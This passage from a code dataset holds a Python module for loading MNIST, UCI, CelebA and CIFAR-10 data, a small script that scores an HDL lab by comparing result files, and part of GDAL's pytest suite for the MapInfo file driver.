Test data.\n\n :return: (train_set, test_set, mean, std), The standardized dataset and\n their mean and standard deviation before processing.\n \"\"\"\n std = np.std(data_train, 0, keepdims=True)\n std[std == 0] = 1\n mean = np.mean(data_train, 0, keepdims=True)\n data_train_standardized = (data_train - mean) / std\n data_test_standardized = (data_test - mean) / std\n mean, std = np.squeeze(mean, 0), np.squeeze(std, 0)\n return data_train_standardized, data_test_standardized, mean, std\n\n\ndef to_one_hot(x, depth):\n \"\"\"\n Get one-hot representation of a 1-D numpy array of integers.\n\n :param x: 1-D Numpy array of type int.\n :param depth: A int.\n\n :return: 2-D Numpy array of type int.\n \"\"\"\n ret = np.zeros((x.shape[0], depth))\n ret[np.arange(x.shape[0]), x] = 1\n return ret\n\n\ndef download_dataset(url, path):\n print('Downloading data from %s' % url)\n urllib.request.urlretrieve(url, path)\n\n\ndef load_mnist_realval(path, one_hot=True, dequantify=False):\n \"\"\"\n Loads the real valued MNIST dataset.\n\n :param path: Path to the dataset file.\n :param one_hot: Whether to use one-hot representation for the labels.\n :param dequantify: Whether to add uniform noise to dequantify the data\n following (Uria, 2013).\n\n :return: The MNIST dataset.\n \"\"\"\n if not os.path.isfile(path):\n data_dir = os.path.dirname(path)\n if not os.path.exists(os.path.dirname(path)):\n os.makedirs(data_dir)\n download_dataset('http://www.iro.umontreal.ca/~lisa/deep/data/mnist'\n '/mnist.pkl.gz', path)\n\n f = gzip.open(path, 'rb')\n if six.PY2:\n train_set, valid_set, test_set = pickle.load(f)\n else:\n train_set, valid_set, test_set = pickle.load(f, encoding='latin1')\n f.close()\n x_train, t_train = train_set[0], train_set[1]\n x_valid, t_valid = valid_set[0], valid_set[1]\n x_test, t_test = test_set[0], test_set[1]\n if dequantify:\n x_train += np.random.uniform(0, 1. / 256,\n size=x_train.shape).astype('float32')\n x_valid += np.random.uniform(0, 1. / 256,\n size=x_valid.shape).astype('float32')\n x_test += np.random.uniform(0, 1. 
/ 256,\n size=x_test.shape).astype('float32')\n n_y = t_train.max() + 1\n t_transform = (lambda x: to_one_hot(x, n_y)) if one_hot else (lambda x: x)\n return x_train, t_transform(t_train), x_valid, t_transform(t_valid), \\\n x_test, t_transform(t_test)\n\n\ndef load_uci_datasets(path, rng, delimiter=None, dtype=np.float32):\n data = np.loadtxt(path, delimiter=delimiter)\n data = data.astype(dtype)\n permutation = rng.choice(np.arange(data.shape[0]),\n data.shape[0], replace=False)\n size_train = int(np.round(data.shape[0] * 0.8))\n size_test = int(np.round(data.shape[0] * 0.9))\n index_train = permutation[0: size_train]\n index_val = permutation[size_train: size_test]\n index_test = permutation[size_test:]\n\n # np.savetxt(\"index_train.txt\", index_train, fmt='%d')\n # np.savetxt(\"index_test.txt\", index_test, fmt='%d')\n\n X_train, y_train = data[index_train, :-1], data[index_train, -1]\n X_val, y_val = data[index_val, :-1], data[index_val, -1]\n X_test, y_test = data[index_test, :-1], data[index_test, -1]\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\nclass CelebADataset(object):\n def __init__(self, path=\"data/celebA/img_align_celeba.zip\", crop=True):\n self.f = zipfile.ZipFile(path, 'r')\n self.data_files = [i for i in self.f.namelist() if i[-1] != '/']\n if len(self.data_files) < 100000:\n print(\"Only %d images found for celebA, is this right?\" % len(\n self.data_files))\n exit(-1)\n self.train_size = int(np.floor(len(self.data_files) * 0.8))\n self.test_size = len(self.data_files) - self.train_size\n self.train_img = self.data_files[:self.train_size]\n self.test_img = self.data_files[self.train_size:]\n\n self.train_idx = 0\n self.test_idx = 0\n self.data_dims = [64, 64, 3]\n\n self.train_cache = np.ndarray((self.train_size, 64, 64, 3),\n dtype=np.float32)\n self.train_cache_top = 0\n self.test_cache = np.ndarray((self.test_size, 64, 64, 3),\n dtype=np.float32)\n self.test_cache_top = 0\n self.range = [-1.0, 1.0]\n self.is_crop = crop\n self.name = \"celebA\"\n\n \"\"\" Return [batch_size, 64, 64, 3] data array \"\"\"\n def next_batch(self, batch_size):\n # sample_files = self.data[0:batch_size]\n prev_idx = self.train_idx\n self.train_idx += batch_size\n if self.train_idx > self.train_size:\n self.train_idx = batch_size\n prev_idx = 0\n\n if self.train_idx < self.train_cache_top:\n return self.train_cache[prev_idx:self.train_idx, :, :, :]\n else:\n sample_files = self.train_img[prev_idx:self.train_idx]\n sample = [self.get_image(sample_file, self.is_crop)\n for sample_file in sample_files]\n sample_images = np.array(sample).astype(np.float32)\n self.train_cache[prev_idx:self.train_idx] = sample_images\n self.train_cache_top = self.train_idx\n return sample_images\n\n def next_test_batch(self, batch_size):\n prev_idx = self.test_idx\n self.test_idx += batch_size\n if self.test_idx > self.test_size:\n self.test_idx = batch_size\n prev_idx = 0\n\n if self.test_idx < self.test_cache_top:\n return self.test_cache[prev_idx:self.test_idx, :, :, :]\n else:\n sample_files = self.test_img[prev_idx:self.test_idx]\n sample = [self.get_image(sample_file, self.is_crop)\n for sample_file in sample_files]\n sample_images = np.array(sample).astype(np.float32)\n self.test_cache[prev_idx:self.test_idx] = sample_images\n self.test_cache_top = self.test_idx\n return sample_images\n\n def batch_by_index(self, batch_start, batch_end):\n sample_files = self.data_files[batch_start:batch_end]\n sample = [self.get_image(sample_file) for sample_file in sample_files]\n sample_images = 
np.array(sample).astype(np.float32)\n return sample_images\n\n def get_image(self, image_path, is_crop=True):\n file = self.f.open(image_path)\n raw = skimage.img_as_float(io.imread(file))\n image = CelebADataset.transform(raw, is_crop=is_crop)\n return image\n\n @staticmethod\n def center_crop(x, crop_h, crop_w=None, resize_w=64):\n if crop_w is None:\n crop_w = crop_h\n h, w = x.shape[:2]\n j = int(round((h - crop_h) / 2.))\n i = int(round((w - crop_w) / 2.))\n return transform.resize(x[j:j + crop_h, i:i + crop_w],\n [resize_w, resize_w])\n\n @staticmethod\n def full_crop(x):\n if x.shape[0] <= x.shape[1]:\n lb = int((x.shape[1] - x.shape[0]) / 2)\n ub = lb + x.shape[0]\n x = transform.resize(x[:, lb:ub], [64, 64])\n else:\n lb = int((x.shape[0] - x.shape[1]) / 2)\n ub = lb + x.shape[1]\n x = transform.resize(x[lb:ub, :], [64, 64])\n return x\n\n @staticmethod\n def transform(image, npx=148, is_crop=True, resize_w=64):\n # npx : # of pixels width/height of image\n if is_crop:\n cropped_image = CelebADataset.center_crop(image, npx,\n resize_w=resize_w)\n else:\n cropped_image = CelebADataset.full_crop(image)\n return cropped_image\n\n def reset(self):\n self.idx = 0\n\ndef load_cifar10(path, normalize=True, dequantify=False, one_hot=True):\n \"\"\"\n Loads the cifar10 dataset.\n\n :param path: Path to the dataset file.\n :param normalize: Whether to normalize the x data to the range [0, 1].\n :param dequantify: Whether to add uniform noise to dequantify the data\n following (Uria, 2013).\n :param one_hot: Whether to use one-hot representation for the labels.\n\n :return: The cifar10 dataset.\n \"\"\"\n if not os.path.isfile(path):\n data_dir = os.path.dirname(path)\n if not os.path.exists(os.path.dirname(path)):\n os.makedirs(data_dir)\n download_dataset(\n 'http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz', path)\n\n data_dir = os.path.dirname(path)\n batch_dir = os.path.join(data_dir, 'cifar-10-batches-py')\n if not os.path.isfile(os.path.join(batch_dir, 'data_batch_5')):\n with tarfile.open(path) as tar:\n tar.extractall(data_dir)\n\n train_x, train_y = [], []\n for i in range(1, 6):\n batch_file = os.path.join(batch_dir, 'data_batch_' + str(i))\n with open(batch_file, 'rb') as f:\n if six.PY2:\n data = pickle.load(f)\n else:\n data = pickle.load(f, encoding='latin1')\n train_x.append(data['data'])\n train_y.append(data['labels'])\n train_x = np.vstack(train_x)\n train_y = np.hstack(train_y)\n\n test_batch_file = os.path.join(batch_dir, 'test_batch')\n with open(test_batch_file, 'rb') as f:\n if six.PY2:\n data = pickle.load(f)\n else:\n data = pickle.load(f, encoding='latin1')\n test_x = data['data']\n test_y = np.asarray(data['labels'])\n\n train_x = train_x.astype('float32')\n test_x = test_x.astype('float32')\n if dequantify:\n train_x += np.random.uniform(0, 1,\n size=train_x.shape).astype('float32')\n test_x += np.random.uniform(0, 1, size=test_x.shape).astype('float32')\n if normalize:\n train_x = train_x / 256\n test_x = test_x / 256\n\n train_x = train_x.reshape((50000, 3, 32, 32)).transpose(0, 2, 3, 1)\n test_x = test_x.reshape((10000, 3, 32, 32)).transpose(0, 2, 3, 1)\n t_transform = (lambda x: to_one_hot(x, 10)) if one_hot else (lambda x: x)\n return train_x, t_transform(train_y), test_x, t_transform(test_y)\n","repo_name":"thjashin/spectral-stein-grad","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10854,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"19"} 
+{"seq_id":"4807310043","text":"file_1 =open(\"default_results.txt\", \"r\")\r\nfile_2 =open(\"results.txt\", \"r\")\r\ncontent1 = file_1.read()\r\ncontent2 = file_2.read()\r\nlist1 = content1.split(\"\\n\")\r\nlist2 = content2.split(\"\\n\")\r\ncounter1 = 0\r\ncounter2 = 0\r\nfor i in list1:\r\n\tif i:\r\n\t\tcounter1 = counter1 + 1;\r\nfor j in list2:\r\n\tif j:\r\n\t\tcounter2 = counter2 + 1;\r\nline_1 = \"default test cases:\" + str(counter1) + \" result test cases:\" + str(counter2)\r\n\r\nline_2 = \"\\n\"\r\nline_3 = \"default_results and student results differ in \" + str(sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt'))))+ \" lines\"\r\n\r\nline_4 = \"\\n\"\r\nline_5 = \"Percentage:\" + str(100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100)\r\nwith open(\"exam_results.txt\",\"w\") as out:\r\n\tout.writelines([line_1,line_2,line_3,line_4,line_5])\r\nif (100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100 > 40):\r\n\tprint(\"You Passed : \" + str(100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100) + \"%\")\r\nelse:\r\n\tprint(\"You Failed\")\r\n","repo_name":"sudhamshu091/Automation-of-HDL-Lab-evaluation-using-scripts","sub_path":"test/and_gate/sim/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38151078607","text":"import os\nimport random\nimport shutil\nimport sys\nimport time\n\nimport gdaltest\nimport ogrtest\nimport pytest\nimport test_cli_utilities\n\nfrom osgeo import gdal, ogr, osr\n\npytestmark = pytest.mark.require_driver(\"MapInfo File\")\n\n###############################################################################\n@pytest.fixture(autouse=True, scope=\"module\")\ndef module_disable_exceptions():\n with gdaltest.disable_exceptions():\n yield\n\n\n###############################################################################\n# Create table from data/poly.shp\n\n\n@pytest.fixture()\ndef mapinfo_ds(request, tmp_path, poly_feat):\n\n ds_loc = tmp_path\n\n if hasattr(request, \"param\"):\n if request.param == \"MIF\":\n ds_loc = tmp_path / \"wrk.mif\"\n else:\n assert request.param == \"TAB\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(ds_loc)\n\n # This should convert to MapInfo datum name 'New_Zealand_GD49'\n WEIRD_SRS = 'PROJCS[\"NZGD49 / UTM zone 59S\",GEOGCS[\"NZGD49\",DATUM[\"NZGD49\",SPHEROID[\"International 1924\",6378388,297,AUTHORITY[\"EPSG\",\"7022\"]],TOWGS84[59.47,-5.04,187.44,0.47,-0.1,1.024,-4.5993],AUTHORITY[\"EPSG\",\"6272\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4272\"]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",171],PARAMETER[\"scale_factor\",0.9996],PARAMETER[\"false_easting\",500000],PARAMETER[\"false_northing\",10000000],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH],AUTHORITY[\"EPSG\",\"27259\"]]'\n mapinfo_srs = osr.SpatialReference()\n mapinfo_srs.ImportFromWkt(WEIRD_SRS)\n\n #######################################################\n # Create memory Layer\n mapinfo_lyr = ds.CreateLayer(\"tpoly\", mapinfo_srs)\n\n 
#######################################################\n # Setup Schema\n ogrtest.quick_create_layer_def(\n mapinfo_lyr,\n [(\"AREA\", ogr.OFTReal), (\"EAS_ID\", ogr.OFTInteger), (\"PRFEDEA\", ogr.OFTString)],\n )\n\n #######################################################\n # Copy in poly.shp\n\n dst_feat = ogr.Feature(feature_def=mapinfo_lyr.GetLayerDefn())\n\n for feat in poly_feat:\n\n dst_feat.SetFrom(feat)\n mapinfo_lyr.CreateFeature(dst_feat)\n\n #######################################################\n # Close file.\n\n ds = None\n\n return tmp_path\n\n\n###############################################################################\n# Verify that stuff we just wrote is still OK.\n#\n# Note that we allow a fairly significant error since projected\n# coordinates are not stored with much precision in Mapinfo format.\n\n\n@pytest.mark.parametrize(\"mapinfo_ds\", (\"TAB\", \"MIF\"), indirect=True)\ndef test_ogr_mitab_3(mapinfo_ds, poly_feat):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n expect = [168, 169, 166, 158, 165]\n\n with ogrtest.attribute_filter(mapinfo_lyr, \"EAS_ID < 170\"):\n ogrtest.check_features_against_list(mapinfo_lyr, \"EAS_ID\", expect)\n\n for i in range(len(poly_feat)):\n orig_feat = poly_feat[i]\n read_feat = mapinfo_lyr.GetNextFeature()\n\n ogrtest.check_feature_geometry(\n read_feat, orig_feat.GetGeometryRef(), max_error=0.02, context=f\"i={i}\"\n )\n\n for fld in range(3):\n assert orig_feat.GetField(fld) == read_feat.GetField(fld), (\n \"Attribute %d does not match\" % fld\n )\n\n\n###############################################################################\n# Test ExecuteSQL() results layers with geometry.\n\n\ndef test_ogr_mitab_4(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n\n with ds.ExecuteSQL(\"select * from tpoly where prfedea = '35043413'\") as sql_lyr:\n\n ogrtest.check_features_against_list(sql_lyr, \"prfedea\", [\"35043413\"])\n\n sql_lyr.ResetReading()\n feat_read = sql_lyr.GetNextFeature()\n ogrtest.check_feature_geometry(\n feat_read,\n \"POLYGON ((479750.688 4764702.000,479658.594 4764670.000,479640.094 4764721.000,479735.906 4764752.000,479750.688 4764702.000))\",\n max_error=0.02,\n )\n\n\n###############################################################################\n# Test spatial filtering.\n\n\ndef test_ogr_mitab_5(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n with ogrtest.spatial_filter(mapinfo_lyr, 479505, 4763195, 480526, 4762819):\n\n ogrtest.check_features_against_list(mapinfo_lyr, \"eas_id\", [158])\n\n\n###############################################################################\n# Verify that Non-WGS84 datums are populated correctly\n\n\ndef test_ogr_mitab_6(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n srs = mapinfo_lyr.GetSpatialRef()\n datum_name = srs.GetAttrValue(\"PROJCS|GEOGCS|DATUM\")\n\n assert datum_name == \"New_Zealand_GD49\", (\n \"Datum name does not match (expected 'New_Zealand_GD49', got '%s')\" % datum_name\n )\n\n\n###############################################################################\n# Read mif file with 2 character .mid delimiter and verify operation.\n\n\ndef test_ogr_mitab_10():\n\n ds = ogr.Open(\"data/mitab/small.mif\")\n lyr = ds.GetLayer(0)\n\n feat = lyr.GetNextFeature()\n\n assert feat.NAME == \" S. 
11th St.\", \"name attribute wrong.\"\n\n assert feat.FLOODZONE == 10, \"FLOODZONE attribute wrong.\"\n\n ogrtest.check_feature_geometry(\n feat,\n \"POLYGON ((407131.721 155322.441,407134.468 155329.616,407142.741 155327.242,407141.503 155322.467,407140.875 155320.049,407131.721 155322.441))\",\n max_error=0.000000001,\n )\n\n feat = lyr.GetNextFeature()\n\n assert feat.OWNER == 'Guarino \"Chucky\" Sandra', \"owner attribute wrong.\"\n\n lyr = None\n ds = None\n\n\n###############################################################################\n# Verify support for NTF datum with non-greenwich datum per\n# http://trac.osgeo.org/gdal/ticket/1416\n#\n# This test also exercises SRS reference counting as described in issue:\n# http://trac.osgeo.org/gdal/ticket/1680\n\n\ndef test_ogr_mitab_11():\n\n ds = ogr.Open(\"data/mitab/small_ntf.mif\")\n srs = ds.GetLayer(0).GetSpatialRef()\n ds = None\n\n pm_value = srs.GetAttrValue(\"PROJCS|GEOGCS|PRIMEM\", 1)\n assert pm_value[:6] == \"2.3372\", (\n \"got unexpected prime meridian, not paris: \" + pm_value\n )\n\n\n###############################################################################\n# Verify that a newly created mif layer returns a non null layer definition\n\n\ndef test_ogr_mitab_12(tmp_path):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_path, options=[\"FORMAT=MIF\"]\n )\n lyr = ds.CreateLayer(\"testlyrdef\")\n defn = lyr.GetLayerDefn()\n\n assert defn is not None\n\n ogrtest.quick_create_layer_def(lyr, [(\"AREA\", ogr.OFTReal)])\n\n ds = None\n\n\n###############################################################################\n# Verify that field widths and precisions are propagated correctly in TAB and MIF\n\n\n@pytest.mark.parametrize(\"fmt\", (\"TAB\", \"MIF\"))\ndef test_ogr_mitab_13(tmp_path, fmt):\n\n ds = ogr.Open(\"../ogr/data/mitab/testlyrdef.gml\")\n if ds is None:\n pytest.skip()\n\n if test_cli_utilities.get_ogr2ogr_path() is None:\n pytest.skip()\n\n fname = tmp_path / (\"testlyrdef.\" + fmt.lower())\n\n if fmt == \"MIF\":\n dsco = \"-dsco FORMAT=MIF\"\n else:\n dsco = \"\"\n\n gdaltest.runexternal(\n test_cli_utilities.get_ogr2ogr_path()\n + f' -f \"MapInfo File\" {dsco} {fname} ../ogr/data/mitab/testlyrdef.gml'\n )\n\n ds = ogr.Open(fname)\n\n # Check if the width and precision are as preserved.\n lyr = ds.GetLayer(\"testlyrdef\")\n assert lyr is not None, \"Layer missing.\"\n\n defn = lyr.GetLayerDefn()\n\n data = [\n [\"AREA\", ogr.OFTReal, 9, 4],\n [\"VOLUME\", ogr.OFTReal, 0, 0],\n [\"LENGTH\", ogr.OFTInteger, 10, 0],\n [\"WIDTH\", ogr.OFTInteger, 4, 0],\n ]\n\n for field in data:\n fld = defn.GetFieldDefn(defn.GetFieldIndex(field[0]))\n\n if fmt == \"MIF\" and fld.GetType() == ogr.OFTInteger:\n expected_width = 0\n else:\n expected_width = field[2]\n\n assert fld.GetType() == field[1], f\"{field[0]} field type wrong.\"\n assert fld.GetWidth() == expected_width, f\"{field[0]} field width wrong.\"\n\n assert fld.GetPrecision() == field[3], f\"{field[0]} field precision wrong.\"\n\n ds = None\n\n\n###############################################################################\n# Test .mif without .mid (#5141)\n\n\ndef test_ogr_mitab_15(tmp_vsimem):\n\n ds = ogr.Open(\"data/mitab/nomid.mif\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n assert feat is not None\n ds = None\n\n # Test opening .mif without .mid even if there are declared attributes\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_vsimem / \"nomid.mif\")\n lyr = ds.CreateLayer(\"empty\")\n 
lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 1)\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n lyr.CreateFeature(f)\n ds = None\n\n gdal.Unlink(tmp_vsimem / \"nomid.mid\")\n ds = ogr.Open(tmp_vsimem / \"nomid.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if f.IsFieldSet(0) or f.GetGeometryRef() is None:\n f.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Test empty .mif\n\n\ndef test_ogr_mitab_16(tmp_path):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_path / \"empty.mif\")\n lyr = ds.CreateLayer(\"empty\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n ds = ogr.Open(tmp_path / \"empty.mif\")\n assert ds is not None\n ds = None\n\n\n###############################################################################\n# Run test_ogrsf\n\n\n@pytest.mark.parametrize(\"mapinfo_ds\", (\"MIF\", \"TAB\"), indirect=True)\ndef test_ogr_mitab_17(mapinfo_ds):\n\n if test_cli_utilities.get_test_ogrsf_path() is None:\n pytest.skip()\n\n ret = gdaltest.runexternal(\n test_cli_utilities.get_test_ogrsf_path() + \" \" + str(mapinfo_ds)\n )\n assert ret.find(\"INFO\") != -1 and ret.find(\"ERROR\") == -1\n\n\n###############################################################################\n# Test EPSG:2154\n# (https://github.com/mapgears/mitab/issues/1)\n\n\ndef test_ogr_mitab_18(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_18.tab\"\n )\n sr = osr.SpatialReference()\n sr.ImportFromEPSG(2154)\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n # Test with our generated file, and with one generated by MapInfo\n for filename in [\n tmp_vsimem / \"ogr_mitab_18.tab\",\n \"data/mitab/lambert93_francais.TAB\",\n ]:\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n sr_got = lyr.GetSpatialRef()\n wkt = sr_got.ExportToWkt()\n if \"2154\" not in wkt:\n print(filename)\n pytest.fail(sr_got)\n proj4 = sr_got.ExportToProj4()\n assert proj4.startswith(\n \"+proj=lcc +lat_0=46.5 +lon_0=3 +lat_1=49 +lat_2=44 +x_0=700000 +y_0=6600000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs\"\n )\n ds = None\n\n\n###############################################################################\n# Check that we correctly round coordinate to the appropriate precision\n# (https://github.com/mapgears/mitab/issues/2)\n\n\ndef test_ogr_mitab_19():\n\n ds = ogr.Open(\"data/mitab/utm31.TAB\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n # Strict text comparison to check precision\n if feat.GetGeometryRef().ExportToWkt() != \"POINT (485248.12 2261.45)\":\n feat.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Check that we take into account the user defined bound file\n# (https://github.com/mapgears/mitab/issues/3)\n# Also test BOUNDS layer creation option (http://trac.osgeo.org/gdal/ticket/5642)\n\n\n@pytest.mark.parametrize(\"fmt\", (\"TAB\", \"MIF\"))\n@pytest.mark.parametrize(\"i\", (1, 2, 3, 4, 5, 6, 7))\ndef test_ogr_mitab_20(tmp_vsimem, tmp_path, fmt, i):\n\n # Pass i==0: without MITAB_BOUNDS_FILE\n # Pass i==1: with MITAB_BOUNDS_FILE and French bounds : first load\n # Pass i==2: with MITAB_BOUNDS_FILE and French bounds : should use already loaded file\n # Pass i==3: without MITAB_BOUNDS_FILE : should unload the 
file\n # Pass i==4: use BOUNDS layer creation option\n # Pass i==5: with MITAB_BOUNDS_FILE and European bounds\n # Pass i==6: with MITAB_BOUNDS_FILE and generic EPSG:2154 (Europe bounds expected)\n\n if i == 1 or i == 2 or i == 5 or i == 6:\n gdal.SetConfigOption(\"MITAB_BOUNDS_FILE\", \"data/mitab/mitab_bounds.txt\")\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / (\"ogr_mitab_20.\" + fmt.lower())\n )\n sr = osr.SpatialReference()\n if i == 1 or i == 2: # French bounds\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"RGF93 / Lambert-93\",\n GEOGCS[\"RGF93\",\n DATUM[\"Reseau_Geodesique_Francais_1993\",\n SPHEROID[\"GRS 80\",6378137,298.257222101],\n TOWGS84[0,0,0,0,0,0,0]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_2SP\"],\n PARAMETER[\"standard_parallel_1\",49.00000000002],\n PARAMETER[\"standard_parallel_2\",44],\n PARAMETER[\"latitude_of_origin\",46.5],\n PARAMETER[\"central_meridian\",3],\n PARAMETER[\"false_easting\",700000],\n PARAMETER[\"false_northing\",6600000],\n UNIT[\"Meter\",1.0],\n AUTHORITY[\"EPSG\",\"2154\"]]\"\"\"\n )\n elif i == 5: # European bounds\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"RGF93 / Lambert-93\",\n GEOGCS[\"RGF93\",\n DATUM[\"Reseau_Geodesique_Francais_1993\",\n SPHEROID[\"GRS 80\",6378137,298.257222101],\n TOWGS84[0,0,0,0,0,0,0]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_2SP\"],\n PARAMETER[\"standard_parallel_1\",49.00000000001],\n PARAMETER[\"standard_parallel_2\",44],\n PARAMETER[\"latitude_of_origin\",46.5],\n PARAMETER[\"central_meridian\",3],\n PARAMETER[\"false_easting\",700000],\n PARAMETER[\"false_northing\",6600000],\n UNIT[\"Meter\",1.0],\n AUTHORITY[\"EPSG\",\"2154\"]]\"\"\"\n )\n else:\n sr.ImportFromEPSG(2154)\n if i == 4:\n lyr = ds.CreateLayer(\n \"test\", srs=sr, options=[\"BOUNDS=75000,6000000,1275000,7200000\"]\n )\n else:\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (700000.001 6600000.001)\")\n )\n lyr.CreateFeature(feat)\n ds = None\n gdal.SetConfigOption(\"MITAB_BOUNDS_FILE\", None)\n\n ds = ogr.Open(tmp_vsimem / (\"ogr_mitab_20.\" + fmt.lower()))\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n assert not (\n i == 6 and lyr.GetSpatialRef().ExportToWkt().find(\"49.00000000001\") < 0\n ), fmt\n # Strict text comparison to check precision\n if fmt == \"TAB\":\n if i == 1 or i == 2 or i == 4:\n if feat.GetGeometryRef().ExportToWkt() != \"POINT (700000.001 6600000.001)\":\n print(i)\n feat.DumpReadable()\n pytest.fail(fmt)\n else:\n if feat.GetGeometryRef().ExportToWkt() == \"POINT (700000.001 6600000.001)\":\n print(i)\n feat.DumpReadable()\n pytest.fail(fmt)\n\n ds = None\n\n\n# Test bounds file caching\n\n\n@pytest.mark.parametrize(\"reload_file\", (True, False))\ndef test_ogr_mitab_20bis(tmp_vsimem, tmp_path, reload_file):\n\n if (not reload_file) and (not sys.platform.startswith(\"linux\")):\n pytest.skip(\"Requires Linux\")\n\n bounds_fname = str(tmp_path / \"mitab_bounds.txt\")\n\n for i in range(2):\n with gdal.config_option(\"MITAB_BOUNDS_FILE\", bounds_fname):\n\n if reload_file and i == 1:\n time.sleep(1)\n\n with open(bounds_fname, \"wb\") as f:\n if i == 0:\n f.write(\n \"\"\"Source = CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000\nDestination=CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 
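\n\n###############################################################################\n# Sketch only, not run by the suite: the BOUNDS layer creation option\n# exercised by test_ogr_mitab_20, in isolation. Coordinates written to a .tab\n# are quantized against the layer bounds, so bounds generous enough for the\n# data keep sub-metre precision. The output name is illustrative.\n\n\ndef bounds_option_sketch(out_filename="/vsimem/bounds_sketch.tab"):\n    from osgeo import ogr\n\n    ds = ogr.GetDriverByName("MapInfo File").CreateDataSource(out_filename)\n    lyr = ds.CreateLayer("test", options=["BOUNDS=75000,6000000,1275000,7200000"])\n    lyr.CreateField(ogr.FieldDefn("ID", ogr.OFTInteger))\n    f = ogr.Feature(lyr.GetLayerDefn())\n    f.SetGeometryDirectly(ogr.CreateGeometryFromWkt("POINT (700000.001 6600000.001)"))\n    lyr.CreateFeature(f)\n    ds = None\n\n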
44, 49.00000000001, 700000, 6600000 Bounds (-792421, 5278231) (3520778, 9741029)\"\"\".encode(\n \"ascii\"\n )\n )\n else:\n f.write(\n \"\"\"Source = CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49, 700000, 6600000\nDestination=CoordSys Earth Projection 3, 33, \"m\", 3, 46.5, 44, 49.00000000002, 700000, 6600000 Bounds (75000, 6000000) (1275000, 7200000)\"\"\".encode(\n \"ascii\"\n )\n )\n\n if not reload_file:\n # Set the modification time of the bounds file to a constant\n # value. This will prevent MITABLookupCoordSysBounds from\n # loading the changed file, so the i == 0 bounds will continue\n # to be used.\n os.system(f'touch -d \"1970-01-01 00:00:01\" {bounds_fname}')\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_20.tab\"\n )\n sr = osr.SpatialReference()\n sr.ImportFromEPSG(2154)\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n feat = ogr.Feature(lyr.GetLayerDefn())\n feat.SetGeometryDirectly(\n ogr.CreateGeometryFromWkt(\"POINT (700000.001 6600000.001)\")\n )\n lyr.CreateFeature(feat)\n ds = None\n ds = ogr.Open(tmp_vsimem / \"ogr_mitab_20.tab\")\n lyr = ds.GetLayer(0)\n if i == 0 or not reload_file:\n expected = \"49.00000000001\" # value from original file\n else:\n expected = \"49.00000000002\" # value from overwritten file\n assert expected in lyr.GetSpatialRef().ExportToWkt()\n\n ds = None\n\n\n###############################################################################\n# Create .tab without explicit 